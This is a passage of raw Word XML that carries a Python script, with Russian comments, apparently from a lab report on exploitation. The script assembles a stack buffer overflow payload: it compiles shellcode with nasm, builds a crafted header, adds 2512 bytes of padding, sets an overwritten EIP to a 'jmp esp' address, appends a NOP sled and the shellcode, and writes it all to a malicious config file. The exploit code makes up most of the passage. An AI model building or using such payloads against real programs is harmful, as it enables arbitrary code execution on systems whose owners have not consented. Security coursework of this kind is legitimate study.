            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> = "shellcode.asm"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2267904E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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>bin_file</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> = "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>shellcode.bin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A17B24F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</w:p>
          <w:p w14:paraId="7A2086D1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print(f"[*] </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>Компилируем</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> {</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>asm_file</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>} в {</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>bin_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>file</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>}...</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CE10586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if not </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>os.path</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>.exists</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>asm_file</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F9DBA6C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    </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>print(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>f"Ошибка</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>файл</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> {</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>asm_file</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">} </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>не</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>найден</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1105ABC9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    </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>exit(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>1)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="219BFCE3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</w:p>
          <w:p w14:paraId="78415326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#nasm -f bin shellcode.asm -o </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>shellcode.bin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="7D1FCBF7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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>compile_cmd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> = ["</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>nasm</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>, "-</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">f", "bin", </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>asm_file</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">, "-o", </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>bin_file</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47E0C9FA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</w:p>
          <w:p w14:paraId="15B1506B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result = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>subprocess.run</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>compile_cmd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">, check=True, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>capture_output</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>=True, text=True)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E66CF1E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proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>print(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>успешная</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>компиляция</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59249F38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</w:p>
          <w:p w14:paraId="6CFD01B4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with </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>open(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>bin_file</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>, "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>rb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>") as f:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="413758D7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    shellcode = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>f.read</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03581317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</w:p>
          <w:p w14:paraId="64E10ACE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header = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>bytearray</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>b'\x00' * 48)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28687C8B" w14:textId="77777777" w:rsidR="00401C70" w:rsidRPr="00E748AD" w:rsidRDefault="00401C70" w:rsidP="00401C70">
            <w:pPr>
              <w:pStyle w:val="af1"/>
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>header</w:t>
            </w:r>
            <w:r w:rsidRPr="00E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">0:4] = </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>struct</w:t>
            </w:r>
            <w:r w:rsidRPr="00E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>pack</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>('&lt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>I</w:t>
            </w:r>
            <w:r w:rsidRPr="00E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">', 2) </w:t>
            </w:r>
            <w:r w:rsidRPr="00401C70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401C70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401C70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># проверка на вариант</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B7EB610" w14:textId="77777777" w:rsidR="00401C70" w:rsidRPr="00E748AD" w:rsidRDefault="00401C70" w:rsidP="00401C70">
            <w:pPr>
              <w:pStyle w:val="af1"/>
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>header</w:t>
            </w:r>
            <w:r w:rsidRPr="00E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">8:12] = </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>struct</w:t>
            </w:r>
            <w:r w:rsidRPr="00E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>pack</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>('&lt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>I</w:t>
            </w:r>
            <w:r w:rsidRPr="00E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>', 4000</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">) </w:t>
            </w:r>
            <w:r w:rsidRPr="00401C70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>#</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> размер буфера, от этого зависит </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>snprintf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</w:p>
          <w:p w14:paraId="571B6E49" w14:textId="77777777" w:rsidR="00401C70" w:rsidRPr="00E748AD" w:rsidRDefault="00401C70" w:rsidP="00401C70">
            <w:pPr>
              <w:pStyle w:val="af1"/>
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5262C4A1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>delimiter = b"/start"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="321E33B9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</w:p>
          <w:p w14:paraId="4BB314E0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padding = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>b"A</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>" * 2512</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3034B8F5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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>eip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>struct.pack</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>('&lt;I', 0x62501297</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>)  #</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>jmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>esp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="71A851D6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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>nop_sled</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> = b"\x90" * 32</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61587FD8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</w:p>
          <w:p w14:paraId="1B2D5A1D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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>debug_trap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> = b"\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>xCC</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>xCC</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35E6B971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</w:p>
          <w:p w14:paraId="6F64F2A6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payload = header + delimiter + padding + </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>eip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> + </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>nop_sled</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> + shellcode</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EBDB8E7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# payload = header + delimiter + padding + </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>eip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> + </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>nop_sled</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> + </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>debug_trap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> + shellcode</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F6B2D4B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</w:p>
          <w:p w14:paraId="6DB552A3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with </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>open(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>"config_2", "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>wb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>") as f:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6030207D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r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>f.write</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>(payload)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="315B3D31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</w:p>
          <w:p w14:paraId="14475C37" w14:textId="77777777" w:rsidR="00401C70" w:rsidRPr="00401C70" w:rsidRDefault="00401C70" w:rsidP="00401C70">
            <w:pPr>
              <w:pStyle w:val="af1"/>
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>print(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>f"Файл</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> 'config_2' </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>сгенерирован</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>Размер</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>: {</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">(payload)} </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
